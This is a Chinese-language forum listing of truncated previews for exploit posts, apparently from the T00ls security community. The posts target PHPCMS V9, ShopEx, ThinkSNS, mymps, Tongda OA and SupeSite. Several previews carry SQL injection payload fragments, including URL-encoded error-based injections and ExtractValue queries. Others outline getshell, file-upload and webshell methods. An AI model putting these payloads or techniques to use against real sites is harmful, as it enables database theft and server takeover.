Web安全
“T00ls新年礼物之三”phpcms__的EXP
脚本安全检测区发不了帖子,只能发在这里了漏洞来源:https://www.t00ls.com/thread-21938-1-1.htmlEXP构造:H4xssck3rskysheep大大发了洞洞,没有EXP,下面也有人求,那小菜我就来构造个吧&info%5B%60content%60%2C%60send%5Ffrom%5Fid%60%2C%60message%5Ftime%60%2C%60status%60%2C%60folder%60%29+V
"T00ls新年礼物之一"phpcms_的EXP
脚本安全检测区发不了帖子,只能发在这里了漏洞来源:https://www.t00ls.com/thread-21894-1-1.htmlEXP构造:H4xssck3rskysheep大大发了洞洞,没有EXP,下面也有人求,那小菜我就来构造个吧%60userid%60%3D%28select+1+from%28select+count%28%2A%29%2Cconcat%28%28select+%28select++%28select+concat
T00ls新年礼物之三:Phpcms V9 短消息回复SQL注入
modules/message/index.phppublic function reply() {if(isset($_POST)) {$messageid = intval($_POST);//判断当前会员,是否可发,短消息.$this->message_db->messagecheck($this->_userid);//检查此消息是否有权限回复 $this->check_user($messageid,'to'); $_POST = $this->_username;$_POST = SYS
PhpCms V9 info[birthday]注入利用
既然官方已经确认了,那就发一下所谓的EXP吧。权当交流,大家测试即可,请勿用于非法。注册后登录,找到个人资料,修改生日,拦截数据包或者直接firebug找到info,将其修改如下:info即可爆出username+hash+salt 。能不能破解出来就看诸位RP了。
T00ls新年礼物之二:shopex通杀SQL注入两处
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.htmlhttp://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.htmlhttp://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentl
T00ls新年礼物之一:phpcms v9 0DAY +测试官方 其他版本未测
绝对刚挖!phpcms v9不知道会不会通杀没测试!语句我就不构造了。修改个人资料日期。你比我懂。不喜勿喷 初来乍道,多多关照。因手贱了发错帖子。(hack6.)顶一下吧。 让我过个好年吧。亲们高抬贵手。
Thinksns 2.8 文件上传漏洞分析&完美利用
一. Thinksns简介ThinkSNS(简称TS),是智士软件开源的开源微博、社交网络平台。采用PHP+MySQL技术平台,微博+应用的产品模式,通过应用、插件、风格包等丰富的机制来扩展功能,同时支持多种常见浏览器和移动客户端。拥有iphone、android客户端以及适合手机浏览的wap版界面,是建立社交网站、微博平台
蚂蚁分类系统mymps_1.6gbk 最新0day
首发T00ls不知道书能不能给一本,0xSafes Team j8g出现在评论处,小问题。放出来怕笑话呢。。{:6_408:} }elseif($do == 'view'){require_once(dirname(__FILE__)."/global.php");require_once(MYMPS_INC."/member.class.php");require_once(MYMPS_INC."/ip.class.php");if(!empty($part)&&$action == '
通达OA 2011-2013 通杀GETSHELL
声明:此程序应用于非常多的政府机构, 教育机构, 以及各大一流公司(中国电信等)!请各位看完本文后不要试图对任何使用本程序的网站进行破坏攻击入侵等...本人发此贴纯属技术交流探讨, 并无怂恿别人去尝试攻击的意思!若不接受以上条件的请自觉关闭, 由此产生的后果与作者(本人)无关!听说土司要送书了, 还
SupeSite 7.5 后台上传webshell
拿webshell方法没有任何技术含量。。网上有很多类似的。{:7_476:} ,但是,这个见网上也没有,自己刚好在一次拿webshell过程中发现的,于是就发出来,当然相关的例子很多。比如以下两个。例子1:Wordpress后台拿WEBSHELL的方法例子2:https://www.t00ls.com/thread-21722-1-1.html方法:进入后台-模型